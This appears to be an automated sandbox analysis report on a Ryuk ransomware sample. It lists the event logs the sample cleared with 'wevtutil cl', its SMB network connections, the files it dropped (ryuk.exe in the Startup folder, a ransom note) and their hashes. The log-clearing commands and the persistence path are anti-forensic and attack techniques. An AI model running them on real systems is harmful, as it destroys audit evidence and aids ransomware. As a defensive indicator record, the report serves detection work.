wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EFS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ESE/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HAL/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Help/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKE/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LSA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LSA/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
NL 154.61.71.51:445 tcp
NL 154.61.71.51:139 tcp
N/A 10.127.0.1:139 tcp
NL 104.80.225.205:443 tcp
US 20.189.173.4:443 tcp
US 204.79.197.200:443 tcp

Files

memory/1900-132-0x0000000000000000-mapping.dmp

memory/4368-133-0x0000000000000000-mapping.dmp

memory/2072-134-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 a650d5676dc2c91a3af2216044ddaf8c
SHA1 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

memory/4980-136-0x0000000000000000-mapping.dmp

memory/1592-137-0x0000000000000000-mapping.dmp

memory/3700-138-0x0000000000000000-mapping.dmp

memory/4152-139-0x0000000000000000-mapping.dmp

memory/1356-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 a650d5676dc2c91a3af2216044ddaf8c
SHA1 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

memory/5088-142-0x0000000000000000-mapping.dmp

memory/1520-143-0x0000000000000000-mapping.dmp

memory/4020-144-0x0000000000000000-mapping.dmp

memory/212-145-0x0000000000000000-mapping.dmp

memory/208-146-0x0000000000000000-mapping.dmp

memory/3776-147-0x0000000000000000-mapping.dmp

memory/3252-148-0x0000000000000000-mapping.dmp

memory/744-149-0x0000000000000000-mapping.dmp

memory/4588-150-0x0000000000000000-mapping.dmp

memory/4652-151-0x0000000000000000-mapping.dmp

memory/1344-152-0x0000000000000000-mapping.dmp

memory/3780-153-0x0000000000000000-mapping.dmp

memory/4992-154-0x0000000000000000-mapping.dmp

memory/4872-155-0x0000000000000000-mapping.dmp

memory/1776-156-0x0000000000000000-mapping.dmp

memory/960-157-0x0000000000000000-mapping.dmp

memory/720-158-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 118c205ef5313a3fdb2195f7cc85d574
SHA1 84366eb25bb1b71cad79603d94c831861db9a582
SHA256 6de10925f82b523bc9ee4631cccf80c70f7fa94f742d4ea0576dcc46bbf25705
SHA512 7eb2b8c0c0abdbf51b3b1c137ad04437b7e0430cfdebca6a7a9a1eaedda7303da3e6757c36086a789351c6988421abb8ecfa34e90a3176485d5f0b6047912c3a

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 e1999233b020758432af3c258bc3e09f
SHA1 88a38f466361594481e5e21b9de7711b9ffe78c2
SHA256 6b5b69a916711b5c4ab9cfd1f63bbb40750a16e4d7af1239ece92ceb754d2458
SHA512 b98e9cf86ebb01692be89359021af0ddcfe27a9ecd41ed7d4cae749b72b014d49ef250654801b6d8dfce9fa9186583450c8963ed148bcc56ca8201bd4bb1b4c0

C:\ProgramData\hrmlog1

MD5 e1999233b020758432af3c258bc3e09f
SHA1 88a38f466361594481e5e21b9de7711b9ffe78c2
SHA256 6b5b69a916711b5c4ab9cfd1f63bbb40750a16e4d7af1239ece92ceb754d2458
SHA512 b98e9cf86ebb01692be89359021af0ddcfe27a9ecd41ed7d4cae749b72b014d49ef250654801b6d8dfce9fa9186583450c8963ed148bcc56ca8201bd4bb1b4c0

memory/3368-162-0x0000000000000000-mapping.dmp

memory/4068-163-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 118c205ef5313a3fdb2195f7cc85d574
SHA1 84366eb25bb1b71cad79603d94c831861db9a582
SHA256 6de10925f82b523bc9ee4631cccf80c70f7fa94f742d4ea0576dcc46bbf25705
SHA512 7eb2b8c0c0abdbf51b3b1c137ad04437b7e0430cfdebca6a7a9a1eaedda7303da3e6757c36086a789351c6988421abb8ecfa34e90a3176485d5f0b6047912c3a

memory/2676-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 e13a72908ef887edf8806393451e6bac
SHA1 d42723ce3121fc41db2c3e1ae67e3756fd8e784a
SHA256 92e0b3516953912aaec77f3244ecef9569b2cb07c047d5467ac3a31a0fd0d3b8
SHA512 7be985395b0d9e1c39af22c30fcfe696725c63003296b06e14f944810860dbbf6cd401d6e0bc40b2c1155e16b08727b95fa66d618a6e71116ac781fda4cfbf11

memory/2720-169-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 118c205ef5313a3fdb2195f7cc85d574
SHA1 84366eb25bb1b71cad79603d94c831861db9a582
SHA256 6de10925f82b523bc9ee4631cccf80c70f7fa94f742d4ea0576dcc46bbf25705
SHA512 7eb2b8c0c0abdbf51b3b1c137ad04437b7e0430cfdebca6a7a9a1eaedda7303da3e6757c36086a789351c6988421abb8ecfa34e90a3176485d5f0b6047912c3a

C:\ProgramData\RYUKID

MD5 e13a72908ef887edf8806393451e6bac
SHA1 d42723ce3121fc41db2c3e1ae67e3756fd8e784a
SHA256 92e0b3516953912aaec77f3244ecef9569b2cb07c047d5467ac3a31a0fd0d3b8
SHA512 7be985395b0d9e1c39af22c30fcfe696725c63003296b06e14f944810860dbbf6cd401d6e0bc40b2c1155e16b08727b95fa66d618a6e71116ac781fda4cfbf11

C:\ProgramData\hrmlog1

MD5 e1999233b020758432af3c258bc3e09f
SHA1 88a38f466361594481e5e21b9de7711b9ffe78c2
SHA256 6b5b69a916711b5c4ab9cfd1f63bbb40750a16e4d7af1239ece92ceb754d2458
SHA512 b98e9cf86ebb01692be89359021af0ddcfe27a9ecd41ed7d4cae749b72b014d49ef250654801b6d8dfce9fa9186583450c8963ed148bcc56ca8201bd4bb1b4c0

memory/5020-171-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 e5776afce2e7d6fa4feb7a0c4bc2e004
SHA1 8b3cd15a7e34d4b1c0800dad92a07c60647f44dd
SHA256 4ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7
